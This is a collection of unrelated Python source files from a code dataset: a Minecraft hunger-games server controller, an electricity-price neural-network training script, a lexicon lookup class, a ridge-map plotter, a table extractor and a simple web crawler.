'.format(self.currEBSDMap.slipSystems[idx][idx2].slipPlaneLabel, \n self.currEBSDMap.slipSystems[idx][idx2].slipDirLabel))\n self.rdrPlot.addText(self.rdrPlot.numLineAx,0.002, RDR-0.01, txt)\n\n self.rdrPlot.numLineAx.set_ylim(slope-1, slope+1)\n self.rdrPlot.numLineAx.set_xlim(-0.01, 0.05)\n","sub_path":"defdap/inspector.py","file_name":"inspector.py","file_ext":"py","file_size_in_byte":20495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"291243467","text":"# def server_command(cmd):\r\n# process.stdin.write(cmd+\"\\n\") #just write the command to the input stream\r\n# process = None\r\n# executable = '\"C:/Program Files/Java/jre1.8.0_191/bin/java.exe\" -Xms4G -Xmx4G -jar \"D:/gd/minecraft_1.15.2/server (6).jar\" nogui java'\r\n# while True:\r\n# command=input()\r\n# command=command.lower()\r\n# if process is not None:\r\n# if command==(\"start\"):\r\n# os.chdir(minecraft_dir)\r\n# process = subprocess.Popen(executable, stdin=subprocess.PIPE)\r\n# print(\"Server started.\")\r\n# else:\r\n# server_command(command)\r\n\r\nimport socket\r\nimport os\r\nimport time\r\nimport pickle\r\nimport numpy as np\r\nimport copy\r\nimport wexpect\r\nimport json\r\nimport random\r\n# import subprocess\r\n# import time\r\n\r\n# mc_server=subprocess.Popen('\"C:/Program Files/Java/jre1.8.0_191/bin/java.exe\" -Xms4G -Xmx4G -jar \"D:/gd/minecraft_1.15.2/server (6).jar\" nogui java',shell=False,stdout=subprocess.PIPE,stdin=subprocess.PIPE)\r\n# mc_server.stdin.write(b'/time set midnight \\n')\r\n# #mc_server.stdin.close()\r\n# mc_server.stdin.flush()\r\n\r\n#this function takes a wexpect connection and returns the player list\r\n#need to adda try catch to this\r\ndef capture_player_list(mc_server):\r\n #print(player_list)\r\n #the start and end of the substring we will be taking\r\n while(True):\r\n #print(mc_server)\r\n #this first line basically just flushed the buffer becaause we want only the output of \"/list\". It will be overwritten\r\n throwRA=mc_server.read_nonblocking()\r\n mc_server.sendline('/list')\r\n time.sleep(0.2)\r\n player_list=mc_server.read_nonblocking()\r\n if ('20 players online:' in player_list) and (not('lost connection: Disconnected' in player_list)) and (not('the game' in player_list)) and player_list.count(\"[Server thread/INFO]\")==1:\r\n print(player_list)\r\n start=player_list.find('20 players online:')+len('20 players online:')+1\r\n end=player_list.rfind('\\r\\n')\r\n players=player_list[start:end].replace(\",\",\"\").split(\" \")\r\n break\r\n return(players)\r\n\r\n#stock server \r\ndef stop_server(mc_server):\r\n mc_server.sendline('/stop')\r\n\r\n#create team block\r\ndef create_teams():\r\n landing=[\"\"]*10\r\n team1=[\"\"]*10\r\n team2=[\"\"]*10\r\n team3=[\"\"]*10\r\n team4=[\"\"]*10\r\n return([landing,team1,team2,team3,team4])\r\n\r\n#for soem reason this function is working on global varibales.\r\ndef update_position(team_data,x,y,new_value):\r\n data=copy.deepcopy(team_data)\r\n data[x][y]=new_value\r\n return(data)\r\n # data=team_data\r\n # data[x][y]=new_value\r\n #return(data)\r\n\r\n\r\n#team_to_add_to is an integer with the group number landing(0), team1(1), team2(2), team3(3), team4(4)\r\ndef add_to_team(team_data,team_to_add_to,name):\r\n #for the team which will have a member added we should find where the next empty slot is\r\n # team_data[team_to_add_to]\r\n filled_already=[]\r\n for poss in team_data[team_to_add_to]:\r\n filled_already.append(not(poss==\"\"))\r\n if sum(filled_already)>9:\r\n #to prevent an error out if over 10 players in one team just return unchanged\r\n return(team_data)\r\n else:\r\n new_free_position=sum(filled_already)\r\n #print(new_free_position)\r\n return(update_position(team_data,x=team_to_add_to,y=new_free_position,new_value=name))\r\n\r\ndef clean_slots(the_list):\r\n if the_list[the_list.index(\"\")+1]==\"\":\r\n return(the_list)\r\n else:\r\n new_list=the_list[0:the_list.index(\"\")] + the_list[the_list.index(\"\")+1:10] + [\"\"]\r\n # new_list.append(the_list[0:the_list.index(\"\")])\r\n # new_list.append(the_list[the_list.index(\"\")+1:9])\r\n # new_list.append(\"\")\r\n return(new_list)\r\n\r\n#remove player from a team\r\ndef remove_from_team(team_data,team_to_remove_from,name):\r\n team_data_copy=copy.deepcopy(team_data)\r\n temp_team=team_data_copy[team_to_remove_from]\r\n removed_team=[]\r\n for i in temp_team:\r\n if name==i:\r\n removed_team.append(\"\")\r\n else:\r\n removed_team.append(i)\r\n #the slot is now empty. players below should be bumped up\r\n team_data_copy[team_to_remove_from]=clean_slots(removed_team)\r\n return(team_data_copy)\r\n\r\n#find the position of a player in the teams\r\ndef find_member_on_team(mylist,char):\r\n for sub_list in mylist:\r\n if char in sub_list:\r\n return (mylist.index(sub_list), sub_list.index(char))\r\n raise ValueError(\"'{char}' is not in list\".format(char = char))\r\n\r\n#update the team data and account for any logins or disconnects\r\ndef check_current_login(mc_server,accounted,team_data):\r\n active_players=capture_player_list(mc_server)\r\n #find any players that are new logins\r\n player_unaccounted=[]\r\n for i in active_players:\r\n player_unaccounted.append(not(i in accounted))\r\n print(i)\r\n player_unaccounted=np.array(active_players)[np.array(player_unaccounted)]\r\n #if there are new players, we should add them to the landing page\r\n if not(len(player_unaccounted)==0):\r\n for player in player_unaccounted:\r\n team_data=add_to_team(team_data,team_to_add_to=0,name=player)\r\n accounted.append(player)\r\n #now check for player which have logged out\r\n player_left=[]\r\n for i in accounted:\r\n player_left.append(not(i in active_players))\r\n #get names of players that logged out\r\n player_logged=np.array(accounted)[np.array(player_left)]\r\n print(len(player_logged))\r\n if not(len(player_logged)==0):\r\n print(\"player left!\")\r\n for player in player_logged:\r\n #need add a function to find where the person is if they moved a team already\r\n a,b=find_member_on_team(team_data,player)\r\n team_data=remove_from_team(team_data,a,name=player)\r\n print(team_data)\r\n print(player)\r\n #remove these players from accounted\r\n accounted=np.array(accounted)[np.array([not i for i in player_left])]\r\n accounted=accounted.tolist()\r\n #return all varibales that change\r\n return(team_data,accounted)\r\n\r\ndef move_player_to_team(team_data,player_to_move,new_team):\r\n for sub_list in team_data:\r\n if player_to_move in sub_list:\r\n x,y=team_data.index(sub_list), sub_list.index(player_to_move)\r\n team_data=remove_from_team(team_data=team_data,team_to_remove_from=x,name=player_to_move)\r\n team_data=add_to_team(team_data=team_data,team_to_add_to=new_team,name=player_to_move)\r\n return(team_data)\r\n print(\"Could not find the selected player. Maybe they logged out\")\r\n print(player_to_move)\r\n return(team_data)\r\n\r\ndef change_player_gamemode(mc_server,player_name,mode):\r\n mc_server.sendline('/gamemode '+mode+\" \"+player_name)\r\n\r\ndef teleport_player(mc_server,player_name,x,y,z):\r\n mc_server.sendline('/teleport '+str(player_name)+\" \"+str(x)+\" \"+str(y)+\" \"+str(z))\r\n\r\ndef create_team(mc_server,team_name):\r\n mc_server.sendline('/team add '+team_name)\r\n\r\ndef add_member_to_team(mc_server,team_name,member_to_add):\r\n mc_server.sendline('/team join '+team_name+\" \"+member_to_add)\r\n\r\ndef kill_all_players(mc_server):\r\n mc_server.sendline('/kill @a')\r\n\r\ndef set_world_border(mc_server,worldborder_size,time=\"\"):\r\n if time==\"\":\r\n mc_server.sendline('/worldborder set '+str(worldborder_size))\r\n else:\r\n mc_server.sendline('/worldborder set '+str(worldborder_size)+\" \"+str(time))\r\n\r\ndef calculate_teams_and_spawns(team_data,worldborder_center,worldborder_start_size,worldborder_end_size,worldborder_collpase_time):\r\n #first lets find the number of teams which contain at least one player\r\n #we will fill active_team with the indexes of [team_data] which are the teams which will play\r\n active_team_indexes=[]\r\n for sublist in team_data:\r\n for underlist in sublist:\r\n if underlist!=\"\":\r\n active_team_indexes.append(team_data.index(sublist))\r\n break\r\n print(active_team_indexes)\r\n if len(active_team_indexes)==0:\r\n print(\"Error. no active teams found.\")\r\n else:\r\n print(\"teams found.\")\r\n #now lets calculate the possible spawn locations. \r\n xhigh=worldborder_center[0]+(worldborder_start_size/2)\r\n xlow=worldborder_center[0]-(worldborder_start_size/2)\r\n yhigh=worldborder_center[1]+(worldborder_start_size/2)\r\n ylow=worldborder_center[1]-(worldborder_start_size/2)\r\n loc_1=[xhigh,ylow]\r\n loc_2=[xlow,yhigh]\r\n loc_3=[xlow,ylow]\r\n loc_4=[xhigh,yhigh]\r\n possible_spawns=[loc_1,loc_2,loc_3,loc_4]\r\n random.shuffle(possible_spawns)\r\n return(active_team_indexes,possible_spawns[0:len(active_team_indexes)])\r\n\r\n# calculate_teams_and_spawns(test.teams,test.worldborder_center_location,test.worldborder_start_size,test.worldborder_end_size,3600)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nclass player:\r\n def __init__(self):\r\n self.teams=create_teams()\r\n self.mc_server=wexpect.spawn('java -Xms4G -Xmx4G -jar \"server (6).jar\" nogui java',cwd=os.path.abspath(\"D:\\\\gd\\\\minecraft_1.15.2\"))\r\n self.accounted=[]\r\n self.worldborder_center_location=[0,0]\r\n self.worldborder_start_size=1000\r\n self.worldborder_end_size=100\r\n self.worldborder_collapse_time=3600\r\n self.initiate_match_teams_indexes=[]\r\n self.initiate_match_teams_spawn_locations=[]\r\n self.total_players=[]\r\n self.check_players_time=0\r\n def check_players(self):\r\n if (time.time()-self.check_players_time)>1:\r\n try:\r\n self.teams,self.accounted=check_current_login(mc_server=self.mc_server,accounted=self.accounted,team_data=self.teams)\r\n self.check_players_time=time.time()\r\n except:\r\n print(\"check_players_error_rebound\")\r\n def stop_pserver(self):\r\n stop_server(self.mc_server)\r\n def move_player(self,player_to_move,new_team):\r\n self.teams=move_player_to_team(team_data=self.teams,player_to_move=player_to_move,new_team=new_team)\r\n def pre_match_calc(self):\r\n self.initiate_match_teams_indexes,self.initiate_match_teams_spawn_locations=calculate_teams_and_spawns(team_data=self.teams,worldborder_center=self.worldborder_center_location,worldborder_start_size=self.worldborder_start_size,worldborder_end_size=self.worldborder_end_size,worldborder_collpase_time=self.worldborder_collapse_time)\r\n def make_teams(self):\r\n #for each team that will play create a team\r\n for i in self.initiate_match_teams_indexes:\r\n #make a clean list of all players. make empty to fill\r\n #create the team name\r\n team_name_assign=str(\"team_\"+str(i))\r\n print(team_name_assign)\r\n create_team(mc_server=self.mc_server,team_name=team_name_assign)\r\n print(\"good\")\r\n #for each team add the members\r\n players_in_team=[]\r\n print(\"good1\")\r\n for player_in_list in self.teams[i]:\r\n if player_in_list!=\"\":\r\n players_in_team.append(player_in_list)\r\n print(players_in_team)\r\n self.total_players.append(players_in_team)\r\n print(self.total_players)\r\n #now we have the list of players, per team add them to the team\r\n print(\"good2\")\r\n for member in players_in_team:\r\n add_member_to_team(mc_server=self.mc_server,team_name=team_name_assign,member_to_add=member)\r\n players_in_team=[]\r\n #delete first element which is the empty list\r\n print(self.total_players)\r\n # del self.total_players[0]\r\n def start_match(self):\r\n self.mc_server.sendline('/say Command to Initiate Match Received.')\r\n self.mc_server.sendline('/say Calculating teams and spawn locations...')\r\n self.mc_server.sendline('/say Assigning players to their teams...')\r\n self.pre_match_calc()\r\n self.make_teams()\r\n self.mc_server.sendline('/say Killing All Players in 10 seconds... Please Respawn to be Full Health')\r\n time.sleep(10)\r\n kill_all_players(mc_server=self.mc_server)\r\n self.mc_server.sendline('/say Teleporting teams to their respective start locations in 5 seconds...')\r\n time.sleep(5)\r\n set_world_border(mc_server=self.mc_server,worldborder_size=self.worldborder_start_size,time=\"\")\r\n #\r\n #make all players creative before the jump\r\n for sublist in self.total_players:\r\n for indiv_player in sublist:\r\n change_player_gamemode(mc_server=self.mc_server,player_name=indiv_player,mode=\"creative\")\r\n print(\"creative\")\r\n #\r\n #teleport teams to staarting\r\n x=0\r\n for sublist in self.total_players:\r\n for indiv_player in sublist:\r\n teleport_player(mc_server=self.mc_server,player_name=indiv_player,x=self.initiate_match_teams_spawn_locations[int(x)][0],y=200,z=self.initiate_match_teams_spawn_locations[int(x)][1])\r\n print(indiv_player)\r\n print(self.initiate_match_teams_spawn_locations[int(x)][0],self.initiate_match_teams_spawn_locations[int(x)][0])\r\n x=x+1\r\n time.sleep(10)\r\n print(\"teleport\")\r\n #\r\n #after players survive the fall turn them back to survival\r\n #make all players creative before the jump\r\n x=0\r\n for sublist in self.total_players:\r\n for indiv_player in sublist:\r\n change_player_gamemode(mc_server=self.mc_server,player_name=indiv_player,mode=\"survival\")\r\n print(indiv_player)\r\n x=x+1\r\n set_world_border(mc_server=self.mc_server,worldborder_size=self.worldborder_end_size,time=self.worldborder_collapse_time)\r\n self.initiate_match_teams_indexes=[]\r\n self.initiate_match_teams_spawn_locations=[]\r\n self.total_players=[]\r\n\r\n\r\n\r\n# test.stop_pserver()\r\n# test=player()\r\n# test.teams\r\n# test.teams[1][0]=\"aaron\"\r\n# test.teams[2][0]=\"aaronddd\"\r\n# test.pre_match_calc()\r\n# test.make_teams()\r\n# test.total_players\r\n\r\n\r\n\r\n# test=player()\r\n# time.sleep(5)\r\n# test.check_players()\r\n# player.teams\r\n# player.accounted\r\n\r\n#aaro=capture_player_list(mc_server)\r\n\r\n\r\n#mc_server=wexpect.spawn('java -Xms4G -Xmx4G -jar \"server (6).jar\" nogui java')\r\n# mc_server=wexpect.spawn('java -Xms4G -Xmx4G -jar \"server (6).jar\" nogui java',cwd=os.path.abspath(\"D:\\\\gd\\\\minecraft_1.15.2\"))\r\n# mc_server.sendline('/time set midnight')\r\n#printout the buffer holding the console output\r\n\r\n\r\n\r\n\r\n# print(mc_server.read_nonblocking())\r\n\r\n#players=capture_player_list(mc_server)\r\n\r\n#list for players already accounted for\r\n\r\n\r\n\r\nHOST = '' # Symbolic name meaning all available interfaces\r\nPORT = 50008 # Arbitrary non-privileged port\r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\ns.bind((HOST, PORT))\r\ns.listen(1)\r\ntest=player()\r\ntime.sleep(5)\r\nwhile True:\r\n clientsocket, addr = s.accept()\r\n print(\"computer\",{addr},\"coonected.\")\r\n msg=clientsocket.recv(1024)\r\n msg=json.loads(msg.decode(\"utf-8\"))\r\n if msg[0]==\"ch_team\":\r\n #xtract list of player to be moved\r\n player_move=msg[2][:-1]\r\n player_move=player_move.split(\" \")\r\n for player in player_move:\r\n test.move_player(player_to_move=player,new_team=int(msg[1]))\r\n elif msg[0]==\"update_teams\": \r\n test.check_players()\r\n elif msg[0]==\"worldborder_start\":\r\n test.worldborder_start_size=int(msg[1])\r\n elif msg[0]==\"worldborder_end\":\r\n test.worldborder_end_size=int(msg[1])\r\n elif msg[0]==\"worldborder_time_move\":\r\n test.worldborder_collapse_time=int(msg[1])\r\n elif msg[0]==\"start_game\":\r\n test.start_match()\r\n temp_teams=copy.deepcopy(test.teams)\r\n temp_teams.append([test.worldborder_start_size,test.worldborder_end_size,test.worldborder_collapse_time])\r\n to_send=temp_teams\r\n # to_send=test.teams\r\n clientsocket.sendall(bytes(json.dumps(to_send),encoding=\"utf-8\"))\r\n \r\n","sub_path":"minecraft_1.15.2/hunger_games.py","file_name":"hunger_games.py","file_ext":"py","file_size_in_byte":16139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"442518766","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Oct 12 20:57:19 2020\n\n@author: bnebe\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\n\nimport sklearn.preprocessing as pp\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.pipeline import Pipeline\n\nfrom sklearn.neural_network import MLPRegressor\n\nimport time\nstart_time = time.time()\n\ndf_raw = pd.read_csv(\"final_df.csv\", index_col=0, parse_dates=True)\n\n# Copy raw file, filter down years and columns\ndf = df_raw.copy()\ndf = df.loc['2018-01-01':'2019-12-31']\ndf = df[['dewpoint', 'rel_humidity', 'temperature', 'wind_direction', 'wind_speed',\n 'Fuel_Price', 'Wind_MW', 'Solar_MW', 'Demand_DLAP_MW', 'Demand_MW', 'Year', \n 'Month', 'Day', 'Hour', 'Weekday', 'Weekend', 'LMP_Price_Per_MWh']]\n\n\n# Feature creation\n# Create wind vectors\ndf['wind_x'] = df['wind_speed'] * np.cos(np.deg2rad(df['wind_direction']))\ndf['wind_y'] = df['wind_speed'] * np.sin(np.deg2rad(df['wind_direction']))\n\n# Create two weeks worth of lagged variables 168\nfor i in range (1, (24*7)):\n df['LMP_Price_Per_MWh -' + str(i) + 'h'] = df['LMP_Price_Per_MWh'].shift(i)\n\n# Create 48 hour lagged CAISO data 48\nfor i in range (1, 24):\n for item in ['Fuel_Price', 'Wind_MW', 'Solar_MW', 'Demand_DLAP_MW', 'Demand_MW']:\n df[item + ' -' + str(i) + 'h'] = df[item].shift(i)\n\n# Create rolling averages\nfor item in ['Wind_MW', 'Solar_MW', 'Demand_DLAP_MW', 'Demand_MW', 'LMP_Price_Per_MWh', 'temperature']:\n if item in ['Solar_MW', 'Wind_MW']:\n df[item + ' 12 roll avg'] = df[item].rolling(window=12).mean()\n else:\n df[item + ' 4 roll avg'] = df[item].rolling(window=4).mean()\n\n# Target DataFrame\n# Create future y's for \ntarget_df = pd.DataFrame(data = df['LMP_Price_Per_MWh'], index = df.index)\nfor i in range (1, 24):\n target_df['LMP_Price_Per_MWh +' + str(i) + 'h'] = target_df['LMP_Price_Per_MWh'].shift(-i)\ntarget_df = target_df.drop(labels = ['LMP_Price_Per_MWh'], axis = 1)\n\n\n# Random split\nX_train, X_test, y_train, y_test = train_test_split(df, target_df, test_size=0.25, random_state=1)\n\n\n# Pre-process Train\nss = pp.StandardScaler()\nX_train = pd.DataFrame(ss.fit_transform(X_train), index=y_train.index)\n\n# Drop NANs after to avoid lagged variables losing values and skewing the scaling\nX_train = X_train.dropna()\ny_train = y_train.loc[X_train.index]\n\ny_train = y_train.dropna()\nX_train = X_train.loc[y_train.index]\n\n\n# MLP Regressor\nregr = MLPRegressor(hidden_layer_sizes = (30, 40, 50, 60, 70), activation = 'relu', solver = 'adam', alpha = 0.05, max_iter=300)\nregr.fit(X_train, y_train)\nprint('R^2:', regr.score(X_train, y_train))\n\nprint('Time to finish: ', (time.time()-start_time)/60)\n\n","sub_path":"Development/model_training.py","file_name":"model_training.py","file_ext":"py","file_size_in_byte":2671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"415975959","text":"#!/usr/bin/env python3\n# lexicon.py jcj 2019-02-20, 2020-01-23\n\n'''A class to implement a lexicon with methods for prefixes and suffixes,\nregular expressions, anagrams, etc'''\n\nimport bisect\nimport re\nimport unicodedata as ud\nfrom collections import defaultdict\n\nINTERVAL = 5 # How often in % is progress notified?\nPASSES = 4 # How many times is each entry processed?\n\nclass LexiconError(Exception):\n\tpass\n\nclass Lexicon:\n\n\tdef __init__(self, fileName, caseBlind=False, diacBlind=False, busyWait=None):\n\t\t'''Initialize an object representing a lexicon from a disk file\n\t\tconsisting of one entry per line (unique but not necessarily sorted)\n\t\twith possible comment lines beginning with a hash sign.\n\t\tMethods are provided for lookup, with possible disregard of\n\t\tcase and/or diacritics, of whole words, prefixes, suffixes,\n\t\tregular expressions, and anagrams. Lookup of whole words and anagrams\n\t\tis optimized. Provision is made for callback to an optional\n\t\tfunction or method to display progress information.'''\n\t\tself.fileName = fileName\n\t\tself.caseBlind = caseBlind\n\t\tself.diacBlind = diacBlind\n\t\tif not busyWait:\n\t\t\tbusyWait = lambda percent, message: None\n\t\tself.words = [] # list of sorted, normalized words\n\t\tself.refs = defaultdict(list) # dict from normalized words\n\t\t # to lists of reference forms\n\t\t\t\t\t\t\t\t\t\t # eg POLISH -> [Polish, polish]\n\t\tself.anags = defaultdict(list) # dict from normalized anagrams\n\t\t # to lists of anagrammatic forms\n\t\t\t\t\t\t\t\t\t\t # eg abeert -> [beater, berate, rebate]\n\t\ttry:\n\t\t\tf = open(fileName)\n\t\texcept Exception as err:\n\t\t\traise LexiconError(err)\n\t\tbusyWait(0, 'Reading...')\n\t\t# Read in a list of lines, without showing any progress.\n\t\t# But then use the number of words read in to time progress updates\n\t\tlines = [ line.rstrip('\\n') for line in f.readlines()\n\t\t\t\t\tif not line.startswith('#') ]\n\t\tself.numLines = len(lines)\n\t\tpcPerLine = 100 / (self.numLines * PASSES) # NB result is a real\n\t\tpcDone = pcPerLine * self.numLines # for the read itself\n\t\t# build dict of normalized forms in self.refs\n\t\tbusyWait(round(pcDone), 'Normalizing...')\n\t\tfor line in lines:\n\t\t\tpcDone += pcPerLine\n\t\t\tif pcDone % INTERVAL < pcPerLine:\n\t\t\t\tbusyWait(round(pcDone), 'Normalizing...')\n\t\t\tself.refs[self.normalized(line, caseBlind, diacBlind)].append(line)\n\t\t# build sorted list of normalized word forms for lookup\n\t\tbusyWait(round(pcDone), 'Sorting...')\n\t\tself.words = sorted(self.refs) # includes only the keys\n\t\tpcDone += pcPerLine * self.numLines\n\t\t# build a separate dictionary of normalized anagram forms\n\t\tbusyWait(round(pcDone), 'Hashing...')\n\t\tfor line in lines: \n\t\t\tpcDone += pcPerLine\n\t\t\tif pcDone % INTERVAL < pcPerLine:\n\t\t\t\tbusyWait(round(pcDone), 'Hashing...')\n\t\t\thash = self.anagramHash(line)\n\t\t\tself.anags[hash].append(line)\n\t\tbusyWait(100, 'Done.')\n\t\tf.close()\n\t\n\tdef normalized(self, s, caseBlind, diacBlind):\n\t\t'''Apply needed transformations to ignore case and/or accents'''\n\t\tif caseBlind:\n\t\t\ts = s.upper()\n\t\tif diacBlind:\n\t\t\ts = ud.normalize('NFKD', s)\n\t\t\ts = ''.join([c for c in s if not ud.combining(c)])\n\t\treturn s\n\t\t\n\tdef length(self):\n\t\t'''Return the number of entries'''\n\t\treturn self.numLines\n\n\tdef anagramHash(self, s):\n\t\t'''Create a unique hash for anagram purposes, ignoring\n\t\torder, letter-case, and all punctuation. Diacritics\n\t\tare ignored only if self.diacBlind is set'''\n\t\t# Unfortunately the \\w class (Unicode 'word' characters)\n\t\t# includes the underscore, so _ must be special-cased\n\t\ts = s.replace('_', '')\n\t\t# Upper-case the string, remove all characters which are not \\w,\n\t\t# and sort the result: thus all anagrammatic strings get the same hash\n\t\treturn ''.join(sorted(re.sub(r'\\W', '',\n\t\t\t\t\t\tself.normalized(s, True, self.diacBlind))))\n\n\tdef contains(self, word):\n\t\t'''Return a list of matching words'''\n\t\tword = self.normalized(word, self.caseBlind, self.diacBlind)\n\t\ti = bisect.bisect_left(self.words, word)\n\t\tif i != len(self.words) and self.words[i] == word:\n\t\t\treturn self.refs[word]\n\t\telse:\n\t\t\treturn []\n\n\tdef regex(self, pattern):\n\t\t'''Return list of matching words'''\n\t\t# we can normalize case but we can't do anything about diacritics\n\t\tflags = re.IGNORECASE if self.caseBlind else 0\n\t\tpattern = re.compile(pattern, flags)\n\t\tmatches = []\n\t\tfor word in self.words:\n\t\t\tm = pattern.search(word)\n\t\t\tif m:\n\t\t\t\tmatches.extend(self.refs[word])\n\t\treturn matches\n\n\tdef hasPrefix(self, prefix):\n\t\t'''Return whether there is any word that begins with prefix'''\n\t\tprefix = self.normalized(prefix, self.caseBlind, self.diacBlind) \n\t\tfor word in self.words:\n\t\t\tif word.startswith(prefix):\n\t\t\t\treturn True\n\t\treturn False\n\n\tdef withPrefix(self, prefix):\n\t\t'''Return a list of words with prefix'''\n\t\tprefix = self.normalized(prefix, self.caseBlind, self.diacBlind)\n\t\treturn [ ' '.join(self.refs[w]) for w in self.words\n\t\t\t\t\tif w.startswith(prefix) ]\n\n\tdef hasSuffix(self, suffix):\n\t\t'''Return whether there is any word that ends with suffix'''\n\t\tsuffix = self.normalized(suffix, self.caseBlind, self.diacBlind)\n\t\tif self.caseBlind:\n\t\t\tsuffix = suffix.upper()\n\t\tfor word in self.words:\n\t\t\tif word.endswith(suffix):\n\t\t\t\treturn True\n\t\treturn False\n\n\tdef withSuffix(self, suffix):\n\t\t'''Return a list of words with suffix'''\n\t\tsuffix = self.normalized(suffix, self.caseBlind, self.diacBlind)\n\t\treturn [ ' '.join(self.refs[w]) for w in self.words\n\t\t\t\t\tif w.endswith(suffix) ]\n\n\n\tdef anagrams(self, word):\n\t\t'''Return a list of anagrams of word, ignoring case and punctuation''' \n\t\treturn self.anags.get(self.anagramHash(word), [])\n\ndef main():\n\tprint('This module is intended to be imported rather than run standalone.')\n\tprint('Use as \"import lexicon\" or \"from lexicon import Lexicon, LexiconError\".')\n\nif __name__ == '__main__':\n\tmain()\n\n","sub_path":"archive/non-i18n/lexicon.py","file_name":"lexicon.py","file_ext":"py","file_size_in_byte":5789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"302319963","text":"import argparse\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom ridge_map import RidgeMap\n\nfrom heightmap import get_image_dims, read_image\n\n\nHEIGHTMAP_FILE = \"heightmaps/los_santos.png\" # input file\nOUTPUT_FILE = \"output/los_santos_desktop.png\" # output file\n\nNUM_LINES = 80 # ideal number of lines to include in ridge map\nX_RESOLUTION = 2 # \"resolution\" in x direction (i.e. for resolution 2, 1 in 2 data points are included)\n\n# (Y_DIM, X_DIM) = get_image_dims(HEIGHTMAP_FILE) # use dims from original file\n(Y_DIM, X_DIM) = (824, 824) # custom dims\n\nDPI = 96 # DPI of my monitor, use link to find out: https://www.infobyip.com/detectmonitordpi.php\nSCALING_FACTOR = 1 # Factor to scale output image by\n\nfig, ax = plt.subplots(figsize=(X_DIM/DPI, Y_DIM/DPI), dpi=DPI)\n\nrm = RidgeMap()\n\nvalues = read_image(HEIGHTMAP_FILE, NUM_LINES, X_RESOLUTION)\n\nvalues = rm.preprocess(values=values,\n water_ntile=40,\n lake_flatness=2,\n vertical_ratio=40)\n\nrm.plot_map(values=values,\n label='',\n label_y=0.2,\n label_x=0.2,\n label_size=20,\n linewidth=2,\n line_color=plt.get_cmap('cool'),\n kind='gradient',\n background_color=np.array([65, 74, 76])/255,\n ax=ax)\n\n# Remove margins around image\n# Solution found from discussions here: https://stackoverflow.com/questions/11837979/removing-white-space-around-a-saved-image-in-matplotlib\nplt.subplots_adjust(top=1, bottom=0, right=1, left=0, hspace=0, wspace=0)\nplt.margins(0, 0)\n\nplt.savefig(OUTPUT_FILE,\n bbox_inches='tight',\n pad_inches=0,\n dpi=DPI*SCALING_FACTOR)\n\nplt.show()","sub_path":"los_santos.py","file_name":"los_santos.py","file_ext":"py","file_size_in_byte":1720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"47673064","text":"from collections import OrderedDict\n\n\nclass TaggedTableToDataStore:\n\n def __init__(self, row_tag_re, column_tag_re, data_store, spacer=\" \"):\n self.row_tag_re = row_tag_re\n self.column_tag_re = column_tag_re\n self.data_store = data_store\n self.spacer = spacer\n\n def get_name(self):\n return \"Tagged Table to Data Store\"\n\n def process(self, document, context):\n\n rows = self.process_node(document.get_root())\n\n for row in rows:\n context.get_store(self.data_store).add(row)\n return document\n\n def process_node(self, node):\n all_rows = []\n\n for line in node.findall(tag_name_re=self.row_tag_re):\n row = OrderedDict()\n for col in line.findall(tag_name_re=self.column_tag_re):\n if col.get_tags()[0] not in row:\n row[col.get_tags()[0]] = []\n row[col.get_tags()[0]].append(col.get_all_content())\n\n all_rows.append(row)\n\n max_cols = 0\n\n for row in all_rows:\n if len(row) > max_cols:\n max_cols = len(row)\n\n final_rows = []\n\n for row in all_rows:\n final_row = []\n for key, value in row.items():\n final_row.append(self.spacer.join(value))\n for n in range(len(final_row), max_cols):\n final_row.append(None)\n final_rows.append(final_row)\n\n return final_rows\n","sub_path":"kodexa/extractors/extractors.py","file_name":"extractors.py","file_ext":"py","file_size_in_byte":1453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"504247205","text":"# !/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport json,requests\nfrom bs4 import BeautifulSoup\n\nclass Crawler:\n url=''\n headers={\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.26 Safari/537.36 Core/1.63.6821.400 QQBrowser/10.3.3040.400'\n }\n data={}\n target_info={}\n #初始化\n def __init__(self,u,d):\n self.url=u\n self.data=d\n\n #返回session对象\n def getSession(self):\n s=requests.session()\n s.post(url=self.url, headers=self.headers, data=self.data)\n return s\n\n #返回get请求结果\n def getGetResponse(self,s,url):\n info=s.get(url)\n return info\n\n #返回初步处理后的结果\n def getHandleInfo(self,res):\n info = BeautifulSoup(res.content, 'html.parser')\n return info\n\n #返回目标信息\n def crawlInfo(self,info):\n target_info=info\n if (len(target_info) > 0):\n return json.dumps(target_info, ensure_ascii=False), 201\n else:\n return \"false\"\n","sub_path":"crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
